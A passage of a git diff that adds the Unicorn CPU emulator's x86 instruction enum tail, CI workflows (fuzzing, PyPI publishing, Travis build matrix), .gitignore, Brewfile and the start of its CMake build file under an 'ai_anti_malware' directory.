UC_X86_INS_VPEXTRQ, + UC_X86_INS_VPEXTRW, + UC_X86_INS_VPGATHERDD, + UC_X86_INS_VPGATHERDQ, + UC_X86_INS_VPGATHERQD, + UC_X86_INS_VPGATHERQQ, + UC_X86_INS_VPHADDBD, + UC_X86_INS_VPHADDBQ, + UC_X86_INS_VPHADDBW, + UC_X86_INS_VPHADDDQ, + UC_X86_INS_VPHADDD, + UC_X86_INS_VPHADDSW, + UC_X86_INS_VPHADDUBD, + UC_X86_INS_VPHADDUBQ, + UC_X86_INS_VPHADDUBW, + UC_X86_INS_VPHADDUDQ, + UC_X86_INS_VPHADDUWD, + UC_X86_INS_VPHADDUWQ, + UC_X86_INS_VPHADDWD, + UC_X86_INS_VPHADDWQ, + UC_X86_INS_VPHADDW, + UC_X86_INS_VPHMINPOSUW, + UC_X86_INS_VPHSUBBW, + UC_X86_INS_VPHSUBDQ, + UC_X86_INS_VPHSUBD, + UC_X86_INS_VPHSUBSW, + UC_X86_INS_VPHSUBWD, + UC_X86_INS_VPHSUBW, + UC_X86_INS_VPINSRB, + UC_X86_INS_VPINSRD, + UC_X86_INS_VPINSRQ, + UC_X86_INS_VPINSRW, + UC_X86_INS_VPLZCNTD, + UC_X86_INS_VPLZCNTQ, + UC_X86_INS_VPMACSDD, + UC_X86_INS_VPMACSDQH, + UC_X86_INS_VPMACSDQL, + UC_X86_INS_VPMACSSDD, + UC_X86_INS_VPMACSSDQH, + UC_X86_INS_VPMACSSDQL, + UC_X86_INS_VPMACSSWD, + UC_X86_INS_VPMACSSWW, + UC_X86_INS_VPMACSWD, + UC_X86_INS_VPMACSWW, + UC_X86_INS_VPMADCSSWD, + UC_X86_INS_VPMADCSWD, + UC_X86_INS_VPMADDUBSW, + UC_X86_INS_VPMADDWD, + UC_X86_INS_VPMASKMOVD, + UC_X86_INS_VPMASKMOVQ, + UC_X86_INS_VPMAXSB, + UC_X86_INS_VPMAXSD, + UC_X86_INS_VPMAXSQ, + UC_X86_INS_VPMAXSW, + UC_X86_INS_VPMAXUB, + UC_X86_INS_VPMAXUD, + UC_X86_INS_VPMAXUQ, + UC_X86_INS_VPMAXUW, + UC_X86_INS_VPMINSB, + UC_X86_INS_VPMINSD, + UC_X86_INS_VPMINSQ, + UC_X86_INS_VPMINSW, + UC_X86_INS_VPMINUB, + UC_X86_INS_VPMINUD, + UC_X86_INS_VPMINUQ, + UC_X86_INS_VPMINUW, + UC_X86_INS_VPMOVDB, + UC_X86_INS_VPMOVDW, + UC_X86_INS_VPMOVM2B, + UC_X86_INS_VPMOVM2D, + UC_X86_INS_VPMOVM2Q, + UC_X86_INS_VPMOVM2W, + UC_X86_INS_VPMOVMSKB, + UC_X86_INS_VPMOVQB, + UC_X86_INS_VPMOVQD, + UC_X86_INS_VPMOVQW, + UC_X86_INS_VPMOVSDB, + UC_X86_INS_VPMOVSDW, + UC_X86_INS_VPMOVSQB, + UC_X86_INS_VPMOVSQD, + UC_X86_INS_VPMOVSQW, + UC_X86_INS_VPMOVSXBD, + UC_X86_INS_VPMOVSXBQ, + UC_X86_INS_VPMOVSXBW, + UC_X86_INS_VPMOVSXDQ, + UC_X86_INS_VPMOVSXWD, + 
UC_X86_INS_VPMOVSXWQ, + UC_X86_INS_VPMOVUSDB, + UC_X86_INS_VPMOVUSDW, + UC_X86_INS_VPMOVUSQB, + UC_X86_INS_VPMOVUSQD, + UC_X86_INS_VPMOVUSQW, + UC_X86_INS_VPMOVZXBD, + UC_X86_INS_VPMOVZXBQ, + UC_X86_INS_VPMOVZXBW, + UC_X86_INS_VPMOVZXDQ, + UC_X86_INS_VPMOVZXWD, + UC_X86_INS_VPMOVZXWQ, + UC_X86_INS_VPMULDQ, + UC_X86_INS_VPMULHRSW, + UC_X86_INS_VPMULHUW, + UC_X86_INS_VPMULHW, + UC_X86_INS_VPMULLD, + UC_X86_INS_VPMULLQ, + UC_X86_INS_VPMULLW, + UC_X86_INS_VPMULUDQ, + UC_X86_INS_VPORD, + UC_X86_INS_VPORQ, + UC_X86_INS_VPOR, + UC_X86_INS_VPPERM, + UC_X86_INS_VPROTB, + UC_X86_INS_VPROTD, + UC_X86_INS_VPROTQ, + UC_X86_INS_VPROTW, + UC_X86_INS_VPSADBW, + UC_X86_INS_VPSCATTERDD, + UC_X86_INS_VPSCATTERDQ, + UC_X86_INS_VPSCATTERQD, + UC_X86_INS_VPSCATTERQQ, + UC_X86_INS_VPSHAB, + UC_X86_INS_VPSHAD, + UC_X86_INS_VPSHAQ, + UC_X86_INS_VPSHAW, + UC_X86_INS_VPSHLB, + UC_X86_INS_VPSHLD, + UC_X86_INS_VPSHLQ, + UC_X86_INS_VPSHLW, + UC_X86_INS_VPSHUFB, + UC_X86_INS_VPSHUFD, + UC_X86_INS_VPSHUFHW, + UC_X86_INS_VPSHUFLW, + UC_X86_INS_VPSIGNB, + UC_X86_INS_VPSIGND, + UC_X86_INS_VPSIGNW, + UC_X86_INS_VPSLLDQ, + UC_X86_INS_VPSLLD, + UC_X86_INS_VPSLLQ, + UC_X86_INS_VPSLLVD, + UC_X86_INS_VPSLLVQ, + UC_X86_INS_VPSLLW, + UC_X86_INS_VPSRAD, + UC_X86_INS_VPSRAQ, + UC_X86_INS_VPSRAVD, + UC_X86_INS_VPSRAVQ, + UC_X86_INS_VPSRAW, + UC_X86_INS_VPSRLDQ, + UC_X86_INS_VPSRLD, + UC_X86_INS_VPSRLQ, + UC_X86_INS_VPSRLVD, + UC_X86_INS_VPSRLVQ, + UC_X86_INS_VPSRLW, + UC_X86_INS_VPSUBB, + UC_X86_INS_VPSUBD, + UC_X86_INS_VPSUBQ, + UC_X86_INS_VPSUBSB, + UC_X86_INS_VPSUBSW, + UC_X86_INS_VPSUBUSB, + UC_X86_INS_VPSUBUSW, + UC_X86_INS_VPSUBW, + UC_X86_INS_VPTESTMD, + UC_X86_INS_VPTESTMQ, + UC_X86_INS_VPTESTNMD, + UC_X86_INS_VPTESTNMQ, + UC_X86_INS_VPTEST, + UC_X86_INS_VPUNPCKHBW, + UC_X86_INS_VPUNPCKHDQ, + UC_X86_INS_VPUNPCKHQDQ, + UC_X86_INS_VPUNPCKHWD, + UC_X86_INS_VPUNPCKLBW, + UC_X86_INS_VPUNPCKLDQ, + UC_X86_INS_VPUNPCKLQDQ, + UC_X86_INS_VPUNPCKLWD, + UC_X86_INS_VPXORD, + UC_X86_INS_VPXORQ, + UC_X86_INS_VPXOR, + 
UC_X86_INS_VRCP14PD, + UC_X86_INS_VRCP14PS, + UC_X86_INS_VRCP14SD, + UC_X86_INS_VRCP14SS, + UC_X86_INS_VRCP28PD, + UC_X86_INS_VRCP28PS, + UC_X86_INS_VRCP28SD, + UC_X86_INS_VRCP28SS, + UC_X86_INS_VRCPPS, + UC_X86_INS_VRCPSS, + UC_X86_INS_VRNDSCALEPD, + UC_X86_INS_VRNDSCALEPS, + UC_X86_INS_VRNDSCALESD, + UC_X86_INS_VRNDSCALESS, + UC_X86_INS_VROUNDPD, + UC_X86_INS_VROUNDPS, + UC_X86_INS_VROUNDSD, + UC_X86_INS_VROUNDSS, + UC_X86_INS_VRSQRT14PD, + UC_X86_INS_VRSQRT14PS, + UC_X86_INS_VRSQRT14SD, + UC_X86_INS_VRSQRT14SS, + UC_X86_INS_VRSQRT28PD, + UC_X86_INS_VRSQRT28PS, + UC_X86_INS_VRSQRT28SD, + UC_X86_INS_VRSQRT28SS, + UC_X86_INS_VRSQRTPS, + UC_X86_INS_VRSQRTSS, + UC_X86_INS_VSCATTERDPD, + UC_X86_INS_VSCATTERDPS, + UC_X86_INS_VSCATTERPF0DPD, + UC_X86_INS_VSCATTERPF0DPS, + UC_X86_INS_VSCATTERPF0QPD, + UC_X86_INS_VSCATTERPF0QPS, + UC_X86_INS_VSCATTERPF1DPD, + UC_X86_INS_VSCATTERPF1DPS, + UC_X86_INS_VSCATTERPF1QPD, + UC_X86_INS_VSCATTERPF1QPS, + UC_X86_INS_VSCATTERQPD, + UC_X86_INS_VSCATTERQPS, + UC_X86_INS_VSHUFPD, + UC_X86_INS_VSHUFPS, + UC_X86_INS_VSQRTPD, + UC_X86_INS_VSQRTPS, + UC_X86_INS_VSQRTSD, + UC_X86_INS_VSQRTSS, + UC_X86_INS_VSTMXCSR, + UC_X86_INS_VSUBPD, + UC_X86_INS_VSUBPS, + UC_X86_INS_VSUBSD, + UC_X86_INS_VSUBSS, + UC_X86_INS_VTESTPD, + UC_X86_INS_VTESTPS, + UC_X86_INS_VUNPCKHPD, + UC_X86_INS_VUNPCKHPS, + UC_X86_INS_VUNPCKLPD, + UC_X86_INS_VUNPCKLPS, + UC_X86_INS_VZEROALL, + UC_X86_INS_VZEROUPPER, + UC_X86_INS_WAIT, + UC_X86_INS_WBINVD, + UC_X86_INS_WRFSBASE, + UC_X86_INS_WRGSBASE, + UC_X86_INS_WRMSR, + UC_X86_INS_XABORT, + UC_X86_INS_XACQUIRE, + UC_X86_INS_XBEGIN, + UC_X86_INS_XCHG, + UC_X86_INS_XCRYPTCBC, + UC_X86_INS_XCRYPTCFB, + UC_X86_INS_XCRYPTCTR, + UC_X86_INS_XCRYPTECB, + UC_X86_INS_XCRYPTOFB, + UC_X86_INS_XEND, + UC_X86_INS_XGETBV, + UC_X86_INS_XLATB, + UC_X86_INS_XRELEASE, + UC_X86_INS_XRSTOR, + UC_X86_INS_XRSTOR64, + UC_X86_INS_XRSTORS, + UC_X86_INS_XRSTORS64, + UC_X86_INS_XSAVE, + UC_X86_INS_XSAVE64, + UC_X86_INS_XSAVEC, + UC_X86_INS_XSAVEC64, + 
UC_X86_INS_XSAVEOPT, + UC_X86_INS_XSAVEOPT64, + UC_X86_INS_XSAVES, + UC_X86_INS_XSAVES64, + UC_X86_INS_XSETBV, + UC_X86_INS_XSHA1, + UC_X86_INS_XSHA256, + UC_X86_INS_XSTORE, + UC_X86_INS_XTEST, + UC_X86_INS_FDISI8087_NOP, + UC_X86_INS_FENI8087_NOP, + + UC_X86_INS_ENDING, // mark the end of the list of insn +} uc_x86_insn; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/.github/workflows/cifuzz.yml b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/cifuzz.yml new file mode 100644 index 0000000..f4259d6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/cifuzz.yml @@ -0,0 +1,23 @@ +name: CIFuzz +on: [pull_request] +jobs: + Fuzzing: + runs-on: ubuntu-latest + steps: + - name: Build Fuzzers + uses: google/oss-fuzz/infra/cifuzz/actions/build_fuzzers@master + with: + oss-fuzz-project-name: 'unicorn' + dry-run: false + - name: Run Fuzzers + uses: google/oss-fuzz/infra/cifuzz/actions/run_fuzzers@master + with: + oss-fuzz-project-name: 'unicorn' + fuzz-seconds: 600 + dry-run: false + - name: Upload Crash + uses: actions/upload-artifact@v1 + if: failure() + with: + name: artifacts + path: ./out/artifacts diff --git a/ai_anti_malware/unicorn/unicorn-master/.github/workflows/python-publish.yml b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/python-publish.yml new file mode 100644 index 0000000..7f0c1de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/python-publish.yml @@ -0,0 +1,67 @@ +name: PyPI 📦 Distribution + +on: [push] + +jobs: + build: + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + os: [windows-latest, macos-latest, ubuntu-latest] + platform: [x32, x64] + steps: + - uses: actions/checkout@v2 + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: '3.x' + + - name: Set up MSVC + if: matrix.os == 'windows-latest' + uses: microsoft/setup-msbuild@v1 + + - name: Install dependencies + run: | + pip install 
setuptools wheel + + - name: Build distribution 📦 + shell: bash + run: | + if [ ${{ matrix.platform }} == 'x32' ] && [ ${{ matrix.os }} == 'windows-latest' ]; then + cd bindings/python && python setup.py build -p win32 sdist bdist_wheel -p win32 + rm dist/*.tar.gz + elif [ ${{ matrix.platform }} == 'x32' ] && [ ${{ matrix.os }} == 'ubuntu-latest' ]; then + docker run --rm -v `pwd`/:/work dockcross/manylinux1-x86 > ./dockcross + chmod +x ./dockcross + ./dockcross bindings/python/build_wheel.sh + elif [ ${{ matrix.platform }} == 'x64' ] && [ ${{ matrix.os }} == 'ubuntu-latest' ]; then + docker run --rm -v `pwd`/:/work dockcross/manylinux1-x64 > ./dockcross + chmod +x ./dockcross + ./dockcross bindings/python/build_wheel.sh + elif [ ${{ matrix.platform }} == 'x32' ] && [ ${{ matrix.os }} == 'macos-latest' ]; then + cd bindings/python && python setup.py sdist + else + cd bindings/python && python setup.py bdist_wheel + fi + + - uses: actions/upload-artifact@v2 + with: + path: ${{ github.workspace }}/bindings/python/dist/* + + publish: + needs: [build] + runs-on: ubuntu-latest + if: startsWith(github.ref, 'refs/tags') + steps: + - uses: actions/download-artifact@v2 + with: + name: artifact + path: dist + + - name: Publish distribution 📦 to PyPI + uses: pypa/gh-action-pypi-publish@master + with: + user: __token__ + password: ${{ secrets.pypi_pass }} diff --git a/ai_anti_malware/unicorn/unicorn-master/.gitignore b/ai_anti_malware/unicorn/unicorn-master/.gitignore new file mode 100644 index 0000000..18fd949 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.gitignore @@ -0,0 +1,101 @@ +.DS_Store +*.swp +*.d +*.o +*.a +*.dSYM +*.so +*.so.* +*.exe +*.dll +*.class +*.jar +*~ + +qemu/config-all-devices.mak + +qemu/aarch64-softmmu/ +qemu/aarch64eb-softmmu/ +qemu/arm-softmmu/ +qemu/armeb-softmmu/ +qemu/m68k-softmmu/ +qemu/mips64el-softmmu/ +qemu/mips64-softmmu/ +qemu/mipsel-softmmu/ +qemu/mips-softmmu/ +qemu/sparc64-softmmu/ +qemu/sparc-softmmu/ +qemu/i386-softmmu/ 
+qemu/x86_64-softmmu/ +qemu/ppc-softmmu/ +qemu/ppc64-softmmu/ + +tags +qemu/config-host.ld +qemu/config.log +qemu/config.status +qemu/config-host.h +qemu/config-host.h-timestamp +qemu/config-host.mak + +libunicorn*.dll +libunicorn*.so +libunicorn*.dylib + +unicorn.pc + +unicorn.lib +unicorn.dll +unicorn.exp +unicorn.def +unicorn_*.lib +unicorn_*.exp +unicorn_*.dll + + +*.tgz +*.zip +*.pyc +_*.txt +_*.diff +tmp/ + +bindings/python/build/ +bindings/python/dist/ +bindings/python/src/ +bindings/python/unicorn.egg-info/ +bindings/python/unicorn/lib/ +bindings/python/unicorn/include/ +bindings/python/MANIFEST +config.log + + +################# +## Visual Studio +################# + +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. + +# vscode +.vscode +.vscode/ + +# User-specific files +*.opensdf +*.sdf +*.suo +*.user +*.sln.docstates + +# Build results + +[Dd]ebug/ +[Rr]elease/ +x64/ +Win32/ +build/ +[Bb]in/ +[Oo]bj/ +packages/ +cmocka/ diff --git a/ai_anti_malware/unicorn/unicorn-master/.travis.yml b/ai_anti_malware/unicorn/unicorn-master/.travis.yml new file mode 100644 index 0000000..c08466b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.travis.yml @@ -0,0 +1,353 @@ +language: c +env: + - PATH=$PATH:/usr/local/opt/binutils/bin +script: + - | + if [[ "$TRAVIS_OS_NAME" == "windows" ]]; then + if [[ "$TRAVIS_COMPILER" == "clang" ]]; then + choco install cygwin cyg-get && \ + cyg-get.bat default autoconf automake make gcc-core clang pkg-config libpcre-devel cmake python27-setuptools ruby wget && \ + export SHELLOPTS && set -o igncr && \ + cmd.exe //C "C:\\tools\\cygwin\\bin\\bash.exe -lc 'cd /cygdrive/$TRAVIS_BUILD_DIR; make header; make'" + else + choco install cygwin cyg-get && \ + cyg-get.bat default autoconf automake make gcc-core clang pkg-config libpcre-devel cmake python27-setuptools ruby wget && \ + export SHELLOPTS && set -o igncr && \ + cmd.exe //C "C:\\tools\\cygwin\\bin\\bash.exe 
-lc 'cd /cygdrive/$TRAVIS_BUILD_DIR; make header; make; ./install-cmocka-linux.sh; export PATH="$PATH":/cygdrive/$TRAVIS_BUILD_DIR:/cygdrive/$TRAVIS_BUILD_DIR/cmocka/src; make test'" + fi + elif [[ "$TRAVIS_CPU_ARCH" == "arm64" ]]; then + make header && make && make -C tests/unit test && make -C tests/regress test + else + make header && make && make -C bindings/go && make -C bindings/go test && make test + fi +compiler: + - clang + - gcc +os: + - linux + - windows +arch: + - amd64 + - arm64 +matrix: + fast_finish: true + exclude: + - os: windows + arch: arm64 + include: + + - name: "Compiler: clang C" + os: osx + osx_image: xcode10.1 + python: 3.7 + compiler: clang + before_cache: + - brew cleanup + - find /usr/local/Homebrew \! -regex ".+\.git.+" -delete; + cache: + directories: + - $HOME/Library/Caches/Homebrew + - /usr/local/Homebrew + before_install: + - cd /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core && git stash && git clean -d -f + script: + - cd $TRAVIS_BUILD_DIR + - make header && make && make -C bindings/go && make -C bindings/go test && make test + + - name: "Compiler: gcc C" + os: osx + osx_image: xcode10.1 + python: 3.7 + compiler: gcc + before_cache: + - brew cleanup + - find /usr/local/Homebrew \! 
-regex ".+\.git.+" -delete; + cache: + directories: + - $HOME/Library/Caches/Homebrew + - /usr/local/Homebrew + before_install: + - cd /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core && git stash && git clean -d -f + script: + - cd $TRAVIS_BUILD_DIR + - make header && make && make -C bindings/go && make -C bindings/go test && make test + + - name: "Linux clang ASAN" + os: linux + compiler: clang + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + - ASAN_OPTIONS=detect_leaks=0 + - CXXFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize=fuzzer-no-link" + - CFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize=fuzzer-no-link" + - LDFLAGS="-fsanitize=address" + script: + - make header && make + - make -C tests/fuzz && sh tests/fuzz/dlcorpus.sh + + - name: "Linux clang MSAN" + os: linux + compiler: clang + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + - ASAN_OPTIONS=detect_leaks=0 + - CXXFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=memory -fsanitize=fuzzer-no-link" + - CFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=memory -fsanitize=fuzzer-no-link" + - LDFLAGS="-fsanitize=memory" + script: + - make header && make + - make -C tests/fuzz && sh tests/fuzz/dlcorpus.sh + + - name: "Linux clang USAN" + os: linux + compiler: clang + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + - ASAN_OPTIONS=detect_leaks=0 + - CXXFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=undefined -fsanitize=fuzzer-no-link" + - CFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=undefined -fsanitize=fuzzer-no-link" + - LDFLAGS="-fsanitize=undefined" + script: + - make header && make + - make -C tests/fuzz && sh tests/fuzz/dlcorpus.sh + + - name: "Linux 32bit" + os: linux + compiler: gcc + env: + - CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" + - PATH=$PATH:/usr/local/opt/binutils/bin + script: make header && make && make -C tests/unit test && 
make -C tests/regress test + addons: + apt: + packages: + - lib32ncurses5-dev + - lib32z1-dev + - libpthread-stubs0-dev + - lib32gcc-4.8-dev + - libc6-dev-i386 + - gcc-multilib + - libcmocka-dev:i386 + + - name: "Linux Cmake 32bit" + os: linux + compiler: gcc + env: + - CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - ../cmake.sh x86 + - cp libunicorn.* ../ + - make -C ../tests/unit test && make -C ../tests/regress test + addons: + apt: + packages: + - lib32ncurses5-dev + - lib32z1-dev + - libpthread-stubs0-dev + - lib32gcc-4.8-dev + - libc6-dev-i386 + - gcc-multilib + - libcmocka-dev:i386 + + - name: "Linux Cmake 64bit" + os: linux + compiler: gcc + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - ../cmake.sh + - cp libunicorn.* ../ + - make -C ../tests/unit test && make -C ../tests/regress test + + - name: "Linux Cmake Static 32bit" + os: linux + compiler: gcc + env: + - CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - cmake -DCMAKE_BUILD_TYPE=Release -DUNICORN_ARCH=x86 -DUNICORN_BUILD_SHARED=OFF .. && make -j8 +# temporarily disable test for static build +# - cp libunicorn.* ../ +# - make -C ../tests/unit test && make -C ../tests/regress test + addons: + apt: + packages: + - lib32ncurses5-dev + - lib32z1-dev + - libpthread-stubs0-dev + - lib32gcc-4.8-dev + - libc6-dev-i386 + - gcc-multilib + - libcmocka-dev:i386 + + - name: "Linux Cmake Static 64bit" + os: linux + compiler: gcc + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - cmake -DCMAKE_BUILD_TYPE=Release -DUNICORN_BUILD_SHARED=OFF .. 
&& make -j8 +# - cp libunicorn.* ../ +# - make -C ../tests/unit test && make -C ../tests/regress test + + - name: "MacOSX brew" + os: osx + osx_image: xcode10.1 + python: 3.7 + before_cache: + - brew cleanup + - find /usr/local/Homebrew \! -regex ".+\.git.+" -delete; + cache: + directories: + - $HOME/Library/Caches/Homebrew + - /usr/local/Homebrew + before_install: + - cd /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core && git stash && git clean -d -f + script: + - brew install --HEAD unicorn + - brew test unicorn + + - name: "Windows nmake 32bit" + os: windows + language: shell + script: + - mkdir build + - cd build + - cmd.exe //C 'C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\VC\Auxiliary\Build\vcvarsall.bat' x86 '&' cmd.exe //C '..\nmake.bat' x86 + + - name: "Windows nmake 64bit" + os: windows + language: shell + script: + - mkdir build + - cd build + - cmd.exe //C 'C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\VC\Auxiliary\Build\vcvarsall.bat' amd64 '&' cmd.exe //C '..\nmake.bat' + + - name: "Windows MSVC 32bit" + os: windows + language: shell + env: + - MSBUILD_PATH="C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin" + script: + - PATH=$MSBUILD_PATH:$PATH + - cmd.exe //C 'msbuild.exe msvc/unicorn.sln /m:2 /nologo /p:Configuration=Release /p:Platform=Win32' + + - name: "Windows MSVC 64bit" + os: windows + language: shell + env: + - MSBUILD_PATH="C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin" + script: + - PATH=$MSBUILD_PATH:$PATH + - cmd.exe //C 'msbuild.exe msvc/unicorn.sln /m:2 /nologo /p:Configuration=Release /p:Platform=x64' + + - name: "Windows MSYS2/MinGW32" + os: windows + language: shell + env: + - PATH=/C/tools/msys64/mingw32/bin:$PATH + before_install: + - | + if [[ ! 
-f /C/tools/msys64/msys2_shell.cmd ]]; then + rm -rf /C/tools/msys64 + fi + - choco uninstall -y mingw + - choco upgrade --no-progress -y msys2 + - export msys2='cmd //C RefreshEnv.cmd ' + - export msys2+='& set MSYS=winsymlinks:nativestrict ' + - export msys2+='& C:\\tools\\msys64\\msys2_shell.cmd -defterm -no-start' + - export shell="$msys2 -mingw32 -full-path -here -c \$\* --" + - export msys2+=" -msys2 -c \$\* --" + - $msys2 pacman --sync --noconfirm --needed \ + autoconf \ + automake \ + make \ + perl \ + python \ + mingw-w64-i686-libtool \ + mingw-w64-i686-toolchain \ + mingw-w64-i686-gcc \ + mingw-w64-i686-cmake \ + mingw-w64-i686-cmocka \ + mingw-w64-i686-python3-setuptools \ + unzip + - export CPPFLAGS=-D__USE_MINGW_ANSI_STDIO=1 + - export CC=i686-w64-mingw32-gcc + - export AR=gcc-ar + - export RANLIB=gcc-ranlib + - export CFLAGS="-m32" + - export LDFLAGS="-m32" + - export LDFLAGS_STATIC="-m32" + - export UNICORN_QEMU_FLAGS="--cpu=i386" +# before_cache: +# - $msys2 pacman --sync --clean --noconfirm +# cache: +# timeout: +# 1000 +# directories: +# - $HOME/AppData/Local/Temp/chocolatey +# - /C/tools/msys64 + script: + - $shell make header; $shell make; cp unicorn.dll /C/Windows/SysWOW64/; $shell make test + + - name: "Windows MSYS2/MinGW64" + os: windows + language: shell + env: + - PATH=/C/tools/msys64/mingw64/bin:$PATH + before_install: + - | + if [[ ! 
-f /C/tools/msys64/msys2_shell.cmd ]]; then + rm -rf /C/tools/msys64 + fi + - choco uninstall -y mingw + - choco upgrade --no-progress -y msys2 + - export msys2='cmd //C RefreshEnv.cmd ' + - export msys2+='& set MSYS=winsymlinks:nativestrict ' + - export msys2+='& C:\\tools\\msys64\\msys2_shell.cmd -defterm -no-start' + - export shell="$msys2 -mingw64 -full-path -here -c \$\* --" + - export msys2+=" -msys2 -c \$\* --" + - $msys2 pacman --sync --noconfirm --needed \ + autoconf \ + automake \ + make \ + perl \ + python \ + mingw-w64-x86_64-libtool \ + mingw-w64-x86_64-toolchain \ + mingw-w64-x86_64-cmake \ + mingw-w64-x86_64-cmocka \ + mingw-w64-x86_64-python3-setuptools + unzip + - export CPPFLAGS=-D__USE_MINGW_ANSI_STDIO=1 + - export CC=x86_64-w64-mingw32-gcc + - export AR=gcc-ar + - export RANLIB=gcc-ranlib +# before_cache: +# - $msys2 pacman --sync --clean --noconfirm +# cache: +# timeout: +# 1000 +# directories: +# - $HOME/AppData/Local/Temp/chocolatey +# - /C/tools/msys64 + script: + - $shell make header; $shell make; cp unicorn.dll /C/Windows/System32/; $shell make test +addons: + apt: + packages: + - libpthread-stubs0-dev + - libcmocka-dev + homebrew: + update: true + brewfile: true diff --git a/ai_anti_malware/unicorn/unicorn-master/AUTHORS.TXT b/ai_anti_malware/unicorn/unicorn-master/AUTHORS.TXT new file mode 100644 index 0000000..5d4ea77 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/AUTHORS.TXT @@ -0,0 +1,2 @@ +Nguyen Anh Quynh +Dang Hoang Vu diff --git a/ai_anti_malware/unicorn/unicorn-master/Brewfile b/ai_anti_malware/unicorn/unicorn-master/Brewfile new file mode 100644 index 0000000..82c6563 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/Brewfile @@ -0,0 +1,6 @@ +# Travis CI setup for MacOS Brew + +# used for testing framework +brew "cmocka" +# used for cross assembly of code for testing +brew "crosstool-ng" diff --git a/ai_anti_malware/unicorn/unicorn-master/CMakeLists.txt b/ai_anti_malware/unicorn/unicorn-master/CMakeLists.txt 
new file mode 100644 index 0000000..c2b4da1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/CMakeLists.txt @@ -0,0 +1,980 @@ +# Tested on window10(x64) with vs2019. +# Open the "x86 Native Tools Command Prompt for VS 2019", +# cd ${UNICORN_SOURCE_DIR} +# mkdir build +# cd build +# cmake -G "NMake Makefiles" .. +# nmake +# Or Open "x64 Native Tools Command Prompt for VS 2019" for 64bit binary. +# Tested on Ubuntu-1804-amd64 with gcc. +# $ cd ${UNICORN_SOURCE_DIR} +# $ mkdir build +# $ cd build +# $ cmake .. +# $ make +# By Huitao Chen, 2019 + +cmake_minimum_required(VERSION 3.1) +project(unicorn C) + +set(UNICORN_VERSION_MAJOR 1) +set(UNICORN_VERSION_MINOR 0) +set(UNICORN_VERSION_PATCH 2) + +option(UNICORN_BUILD_SHARED "Build shared instead of static library" ON) + +if (NOT UNICORN_ARCH) + # build all architectures + set(UNICORN_ARCH "x86 arm aarch64 m68k mips sparc") +endif() + +string(TOUPPER ${UNICORN_ARCH} UNICORN_ARCH) +string(REPLACE " " ";" UNICORN_ARCH_LIST ${UNICORN_ARCH}) + +foreach(ARCH_LOOP ${UNICORN_ARCH_LIST}) + set(UNICORN_HAS_${ARCH_LOOP} TRUE) +endforeach(ARCH_LOOP) + +# qemu uses assert(). It is not recommended to define NDEBUG if using assert() +# to detect error conditions since the software may behave +# non-deterministically. Remove the NDEBUG macro. 
+if(CMAKE_BUILD_TYPE STREQUAL "Release") + string(REPLACE "-DNDEBUG" "" CMAKE_C_FLAGS_RELEASE ${CMAKE_C_FLAGS_RELEASE}) +endif() + +if(MSVC) + include_directories( + ${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn + ) +else() + include_directories( + ${CMAKE_BINARY_DIR} + ) +endif() + +include_directories( + qemu + qemu/include + qemu/tcg + include +) + +if(MSVC) + if(CMAKE_SIZEOF_VOID_P EQUAL 8) + set(MSVC_FLAG -D__x86_64__) + elseif(CMAKE_SIZEOF_VOID_P EQUAL 4) + set(MSVC_FLAG -D__i386__) + else() + message(FATAL_ERROR "Neither WIN64 or WIN32!") + endif() + add_compile_options( + -Dinline=__inline + -D__func__=__FUNCTION__ + -D_CRT_SECURE_NO_WARNINGS + -DWIN32_LEAN_AND_MEAN + ${MSVC_FLAG} + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/i386 + /wd4018 /wd4244 /wd4267 + ) + if(CMAKE_BUILD_TYPE STREQUAL "Debug") + string(REPLACE "/ZI" "/Zi" CMAKE_C_FLAGS_DEBUG ${CMAKE_C_FLAGS_DEBUG}) + endif() + # default use the multithread, static version of the run-time library. + option(UNICORN_STATIC_MSVCRT "Embed static runtime library" ON) + if 